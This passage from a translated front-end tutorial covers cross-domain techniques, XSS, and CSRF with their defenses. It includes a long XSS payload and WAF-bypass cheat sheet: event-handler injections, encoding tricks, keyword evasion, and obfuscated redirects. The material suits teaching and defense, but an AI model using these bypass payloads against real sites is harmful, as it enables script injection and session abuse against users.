2.) proxy.html: (www.domain1.com/proxy… ) an intermediate proxy page, same domain as a.html, with empty content.
3.) B.HTML (www.domain2.com/b.html)
```html
<script>
  window.name = 'This is domain2 data!';
</script>
```
Summary: the iframe's `src` attribute carries the data from the foreign domain into the page; the iframe is then redirected back to a page in the local domain, and the cross-domain data is handed over by the iframe's `window.name`, which survives the navigation. This neatly sidesteps the browser's cross-domain access restrictions while remaining a safe, same-origin operation.
PostMessage cross-domain
postMessage is an HTML5 API and one of the few `window` properties that can be operated across domains. It can be used to solve the following problems:
- Data transfer between the page and the new window it opens
- Messaging between multiple Windows
- Page with nested IFrame message delivery
- Cross-domain data transfer for the three scenarios above
Usage: the `postMessage(data, origin)` method takes two arguments:

- `data`: the HTML5 specification allows any primitive type or clonable object, but some browsers only support strings, so it is best to serialize parameters with `JSON.stringify()`.
- `origin`: protocol + host + port number. It may also be `"*"`, meaning the message can be delivered to any window; to target only the same origin as the current window, set it to `"/"`.
1.) A.HTML (www.domain1.com/a.html)
```html
<iframe id="iframe" src="http://www.domain2.com/b.html" style="display:none;"></iframe>
<script>
  var iframe = document.getElementById('iframe');
  iframe.onload = function() {
    var data = {
      name: 'aym'
    };
    // Send cross-domain data to domain2
    iframe.contentWindow.postMessage(JSON.stringify(data), 'http://www.domain2.com');
  };

  // Receive data from domain2
  window.addEventListener('message', function(e) {
    alert('data from domain2 ---> ' + e.data);
  }, false);
</script>
```
2.) B.HTML (www.domain2.com/b.html)
```html
<script>
  // Receive data from domain1
  window.addEventListener('message', function(e) {
    alert('data from domain1 ---> ' + e.data);
    var data = JSON.parse(e.data);
    if (data) {
      data.number = 16;
      // Send it back to domain1
      window.parent.postMessage(JSON.stringify(data), 'http://www.domain1.com');
    }
  }, false);
</script>
```
WebSocket communicates across domains
```js
var ws = new WebSocket('wss://echo.websocket.org'); // points at the back-end service
ws.onopen = function(evt) {
  ws.send('some message');
};
ws.onmessage = function(evt) {
  console.log(evt.data);
};
ws.onclose = function(evt) {
  console.log('Connection closed');
};
```
Nginx agents cross domains
- Nginx configuration to serve iconfont cross-domain
Browsers allow conventional static resources such as JS, CSS, and images to be loaded cross-domain under the same-origin policy, but iconfont font files (eot|otf|ttf|woff|svg) are an exception. Add the following configuration to the static-resource server block in nginx:

```nginx
location / {
  add_header Access-Control-Allow-Origin *;
}
```
- Nginx reverse proxy interfaces cross domains
Cross-domain principle: the same-origin policy is a browser security policy, not part of the HTTP protocol. A server calling an HTTP interface simply uses the HTTP protocol and does not execute JS scripts, so the same-origin policy does not apply and there is no cross-domain problem. Implementation idea: use nginx to configure a proxy server (same domain name as domain1, different port) as a relay that reverse-proxies requests to the domain2 interface, and, along the way, rewrites the domain in the cookie so that the cookie can be written into the current domain, enabling cross-domain login.

nginx configuration:

```nginx
# proxy server
server {
    listen       81;
    server_name  www.domain1.com;

    location / {
        proxy_pass   http://www.domain2.com:8080;              # reverse proxy
        proxy_cookie_domain www.domain2.com www.domain1.com;   # rewrite the cookie domain
        index  index.html index.htm;

        # When a middleware proxy such as webpack-dev-server accesses this nginx
        # interface, no browser is involved, so there is no origin restriction
        # and the headers below can be omitted
        add_header Access-Control-Allow-Origin http://www.domain1.com;  # use * if the front end only crosses domains without cookies
        add_header Access-Control-Allow-Credentials true;
    }
}
```
- Front-end code example:

```js
var xhr = new XMLHttpRequest();

// Front-end switch: whether the browser reads/writes cookies
xhr.withCredentials = true;

// Access the proxy server configured in nginx
xhr.open('get', 'http://www.domain1.com:81/?user=admin', true);
xhr.send();
```

- Node.js back-end example:

```js
var http = require('http');
var server = http.createServer();
var qs = require('querystring');

server.on('request', function(req, res) {
    var params = qs.parse(req.url.substring(2));

    // Write a cookie to the front end
    res.writeHead(200, {
        'Set-Cookie': 'l=a123456; Path=/; Domain=www.domain2.com; HttpOnly'   // HttpOnly: scripts cannot read it
    });

    res.write(JSON.stringify(params));
    res.end();
});

server.listen('8080');
console.log('Server is running at port 8080...');
```
Nodejs middleware proxies cross domains
Node middleware implements a cross-domain proxy in roughly the same way as nginx: it starts a proxy server that forwards data, and the `cookieDomainRewrite` parameter can rewrite the domain in response-header cookies so they can be written into the current domain, making interface login authentication easier.
Cross-domain for non-Vue frameworks (two cross-domain hops)
Build a proxy server with Node + Express + http-proxy-middleware.

1.) Front-end code example:

```js
var xhr = new XMLHttpRequest();

// Front-end switch: whether the browser reads/writes cookies
xhr.withCredentials = true;

// Access the http-proxy-middleware proxy server
xhr.open('get', 'http://www.domain1.com:3000/login?user=admin', true);
xhr.send();
```

2.) Middleware server:

```js
var express = require('express');
var proxy = require('http-proxy-middleware');
var app = express();

app.use('/', proxy({
    // Proxy the cross-domain target interface
    target: 'http://www.domain2.com:8080',
    changeOrigin: true,

    // Modify the response headers: allow this origin and cookies
    onProxyRes: function(proxyRes, req, res) {
        res.header('Access-Control-Allow-Origin', 'http://www.domain1.com');
        res.header('Access-Control-Allow-Credentials', 'true');
    },

    // Rewrite the cookie domain in the response
    cookieDomainRewrite: 'www.domain1.com'   // may be false, meaning no rewrite
}));

app.listen(3000);
console.log('Proxy server is listening at port 3000...');
```
XSS
Cross-Site Scripting (XSS) means a malicious attacker exploits a site that does not escape or filter user-submitted data to inject code into its pages, so that the code executes when other users visit.
Such attacks can steal user information, perform actions under the user's identity, or attack visitors with malware.
The hazards of XSS attacks include:
- Get page data
- To obtain
cookie
- Hijack front-end logic
- Send the request
- Stealing arbitrary data from websites
- Steal user information
- Steal user passwords and logins
- Cheat users
XSS attack classification
reflective
Direct injection via URL parameters.
When a request is made, the XSS code appears in the URL and is submitted to the server as input. The server parses and returns, and the XSS code is sent back to the browser along with the response, and the browser finally executes the XSS code. This process is called reflective XSS because it is like a reflection.
For example
A link whose query string contains a script tag whose `src` points at malicious code. The user clicks the link, sending the request to the server; the server's response carries the XSS code back, and the browser writes the query result into the HTML and executes it.
Note that a URL is not necessarily safe just because no script tag is visible in it: URL shorteners can hide a very long malicious URL behind a short one.
Storage type
Stored XSS is saved to the database; when other users visit (the front end renders) the data, the code executes in their browsers.
For example
For example, an attacker writes a script tag to a comment on an article. The comment is saved to the database and executed when other users see the article.
XSS attack injection point
- `HTML` node content: the content of a node is dynamically generated and includes user input.
- `HTML` attributes: some node attribute values are generated from user input; the input can close the attribute and tag to append a `script` tag, or inject an extra attribute:

```html
<img src="${image}"/>
<img src="1" onerror="alert(1)" />
```

- `JavaScript` code: `JS` contains variables injected by the back end or entered by the user:

```js
var data = "#{data}";
var data = "hello"; alert(1); "";
```

- Rich text
XSS defenses
There are generally two ways to defend against XSS attacks:

- Escaping characters
- `CSP` (Content Security Policy)
Escaping characters

- For normal input, encode it:
  - Apply `HTML Entity` encoding (escape characters) to user input, covering `"`, `&`, `<`, `>`, and spaces.
- For rich text, filter it (blacklist or whitelist):
  - Remove uploaded `DOM` event attributes, such as `onerror`;
  - Remove uploaded `style` nodes, `script` nodes, `iframe` nodes, etc.
- Notes:
  - Avoid performing `HTML Entity` decoding directly;
  - Use a `DOM` parser to convert the markup, correcting unpaired `DOM` tags and attributes.
For strings that appear in the DOM (user data):

- `<` escapes to `&lt;`
- `>` escapes to `&gt;`

For data that may appear in DOM element attributes:

- `"` escapes to `&quot;`
- `'` escapes to `&#39;`
- A space is escaped to its entity form (e.g. `&#32;`); this can produce runs of escaped spaces, so you may leave spaces unescaped, but then be sure to wrap attribute values in double quotes
- The `&` character must be escaped first in the escaping function
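The rules above can be collected into a small helper (the function name is illustrative):

```javascript
// Minimal sketch of the escaping rules: & first, then the other characters,
// so the entities we introduce are not themselves re-escaped.
function htmlEscape(str) {
  return str
    .replace(/&/g, '&amp;')   // & must be escaped first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```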
Avoid inserting user data directly into JS:

```js
var data = "#{data}";
// becomes, after injection:
var data = "hello"; alert(1); "";
```

Because the variable is wrapped in quotes and the attack works by terminating the string early, escaping the quotes is enough:

```
first \ -> \\  then " -> \"
```
The rich text
Filter according to a blacklist (`script` tags, etc.):

```js
function xssFilter(html) {
  html = html.replace(/<\s*\/?script\s*>/g, '');
  html = html.replace(/javascript:[^'"]*/g, '');
  html = html.replace(/onerror\s*=\s*['"]?[^'"]*['"]?/g, '');
  // ...
  return html;
}
```
Filter by whitelist: Only certain tags and attributes are allowed
How to do it: Parse the HTML into a tree structure. For the DOM tree, look one by one to see if there are valid tags and attributes. If not, remove them.
Using Cheerio you can quickly parse the DOM
```js
function xssFilter(html) {
  const cheerio = require('cheerio');
  const $ = cheerio.load(html);

  // whitelist
  const whiteList = { 'img': ['src'] };

  $('*').each((index, elem) => {
    // Remove tags that are not in the whitelist
    if (!whiteList[elem.name]) {
      $(elem).remove();
      return;
    }
    // Remove attributes not whitelisted for this tag
    for (let attr in elem.attribs) {
      if (whiteList[elem.name].indexOf(attr) === -1) {
        $(elem).attr(attr, null);
      }
    }
  });

  return $.html();
}
```
An NPM package can simplify this work; see, for example, the `xss` package documentation.
CSP content security policy
A CSP is essentially a whitelist where the developer explicitly tells the browser which external resources can be loaded and executed. We just need to configure the rules, how to intercept is up to the browser implementation. We can minimize XSS attacks in this way.
CSP can usually be turned on in two ways:
- Set the `Content-Security-Policy` field in the `HTTP Header`
- Set a meta tag: `<meta http-equiv="Content-Security-Policy">`
Take setting HTTP headers as an example
- Only allow resources from the site's own origin:

```
Content-Security-Policy: default-src 'self'
```

- Only allow images to load over HTTPS:

```
Content-Security-Policy: img-src https://*
```

- Do not allow frames from any source:

```
Content-Security-Policy: child-src 'none'
```
CSP ( Content Security Policy )
XSS injection method
Reference link: xz.aliyun.com/t/4067
`<script>`

```html
<script>alert("xss");</script>
```

`<img>`

```html
<img src=1 onerror=alert("xss");>
```

`<input>`

```html
<input onfocus="alert('xss');">

<!-- the autofocus attribute triggers the element's own focus event
     without user interaction -->
<input onfocus="alert('xss');" autofocus>

<input onblur=alert("xss") autofocus><input autofocus>
```

`<details>`

```html
<details ontoggle="alert('xss');">

<!-- the open attribute triggers the toggle event automatically -->
<details open ontoggle="alert('xss');">
```

`<svg>`

```html
<svg onload=alert("xss");>
```

`<select>`

```html
<select onfocus=alert(1)></select>

<!-- the autofocus attribute triggers the element's own focus event -->
<select onfocus=alert(1) autofocus>
```

`<iframe>`

```html
<iframe onload=alert("xss");></iframe>
```

`<video>`

```html
<video><source onerror="alert(1)">
```

`<audio>`

```html
<audio src=x onerror=alert("xss");>
```

`<body>`

```html
<body/onload=alert("xss");>
```

Using line breaks and autofocus, the onscroll event fires automatically without the user having to trigger it:

```html
<body onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
```

`<textarea>`

```html
<textarea onfocus=alert("xss"); autofocus>
```

`<keygen>`

```html
<keygen autofocus onfocus=alert(1)>
```

`<marquee>`

```html
<marquee onstart=alert("xss")></marquee>
```

`<isindex>`

```html
<isindex type=image src=1 onerror=alert("xss")>
```

Include a remote JS file using link

PS: only works when no CSP is set

```html
<link rel=import href="http://127.0.0.1/1.js">
```

JavaScript pseudo-protocol

The `<a>` tag

```html
<a href="javascript:alert(`xss`);">xss</a>
```

The `<iframe>` tag

```html
<iframe src=javascript:alert('xss');></iframe>
```

The `<img>` tag

```html
<img src=javascript:alert('xss')>   <!-- IE7 and below -->
```

The `<form>` tag

```html
<form action="Javascript:alert(1)"><input type=submit>
```

other

The expression attribute

```html
<img style="xss:expression(alert('xss'))">
<div style="color: rgb('x:expression(alert(1))')"></div>
<style>#test{x:expression(alert(/xss/))}</style>
```

The background attribute

```html
<table background=javascript:alert(1)></table>   <!-- works on Opera 10.5 and IE6 -->
```
In the case of filtering

Filtering spaces

Use `/` instead of spaces:

```html
<img/src="x"/onerror=alert("xss");>
```

Filtering keywords

Case bypass:

```html
<ImG sRc=x onerRor=alert("xss");>
```

Double-writing the keyword

Some WAFs may replace the keyword only once, with an empty string; in that case we can bypass them by writing the keyword twice:

```html
<imimgg srsrcc=x onerror=alert("xss");>
```

String concatenation

Using `eval`:

```html
<img src="x" onerror="a=`aler`; b=`t`; c='(`xss`);'; eval(a+b+c)">
```

Using `top`:

```html
<script>top["al"+"ert"](`xss`);</script>
```
Other character obfuscation
Some WAFs use regular expressions to detect XSS attacks. If we can fuzz out the regex rules, we can use other characters to obfuscate the injected code. A few simple examples:

```html
1. <<script>alert("xss");//<</script>
2. <title><img src=</title>><img src=x onerror="alert(`xss`);">
3. <SCRIPT>var a="\\";alert("xss");//";</SCRIPT>
```
Encoding bypasses

Unicode bypass

```html
<img src="x" onerror="alert('xss');">
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
```

URL encoding bypass

```html
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
```

ASCII bypass

```html
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
```

Hex bypass

```html
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
```

Octal

```html
<img src=x onerror=alert('\170\163\163')>
```

Base64 bypass

```html
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
```
Filtering double and single quotes

1. In an HTML tag context we do not need quotes at all; in JS we can use backticks instead of single and double quotes:

```html
<img src="x" onerror=alert(`xss`);>
```

2. Use the encoding bypasses shown above.

Filtering brackets

When parentheses are filtered, you can use `throw` to bypass them:

```html
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
```
Filtering URL addresses

Using URL encoding:

```html
<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
```

Using an IP address:

1. Decimal IP:

```html
<img src="x" onerror=document.location=`http://2130706433/`>
```

2. Octal IP:

```html
<img src="x" onerror=document.location=`http://0177.0.0.01/`>
```

3. Hex IP:

```html
<img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>
```

4. `//` can be used instead of `http://`:

```html
<img src="x" onerror=document.location=`//www.baidu.com`>
```
CSRF
CSRF (Cross-Site Request Forgery) is the effect another site can have on this site when both are open in the same browser. The principle: the attacker constructs a request to the target site's back end and induces the user to click it, or triggers it automatically by some means. If the user is logged in, the back end assumes the user initiated the operation and executes the corresponding logic.
For example, the user opens site A and phishing at the same time. Suppose site A has an interface to submit user comments via GET requests, then an attacker can add A picture to the phishing site, the address of which is the comment interface.
```html
<img src="http://www.domain.com/xxx?comment='attack'"/>
```
CSRF attack mechanism
- The user logs in to website A;
- Website A identifies the user (a cookie is sent to the client);
- A page on website B initiates a request to website A (carrying website A's identity cookie).
CSRF defense
- `Get` requests should not modify data;
- Prevent third-party websites from accessing the user's `Cookie`;
- Prevent third-party websites from calling the interfaces;
- Attach verification information to requests, such as a captcha or a `Token`.

SameSite

- Set the `SameSite` attribute on the `Cookie`. It keeps the cookie from being sent along with cross-site requests, which greatly reduces the risk of `CSRF`, but the attribute is not yet supported by every browser.

Token validation

- A `cookie` is attached automatically when a request is sent, but a `Token` is not; so actively send the `Token` with each request.

Referer validation

- For requests that need `CSRF` protection, verify the `Referer` to determine whether the request was initiated by a third-party website.

Other measures

- Hide the token;
- Actively add the token information to the HTTP header;
- Forbid third-party sites from carrying cookies: set the `SameSite` attribute so the cookie travels only with same-site requests.
CSRF worms
If a user has the attacked site open and at the same time visits the attacker's page, the attacker's page uses the user's identity to send requests, for example posting comments or articles in the user's name that contain links to the attacker's page. When other users see those comments, even without clicking anything, their identities are in turn used to send the same malicious requests. The worm therefore spreads faster and faster, and its impact grows larger and larger.
CSRF attack hazards
- Exploits the user's login state;
- Without the user's knowledge;
- Completes business requests;
- Steals the user's funds;
- Impersonates the user to post, leaving the user to take the blame;
- Damages the website's reputation.
Finally
That's all for this article. Thanks for reading — a like, favorite, and follow is the biggest support for me.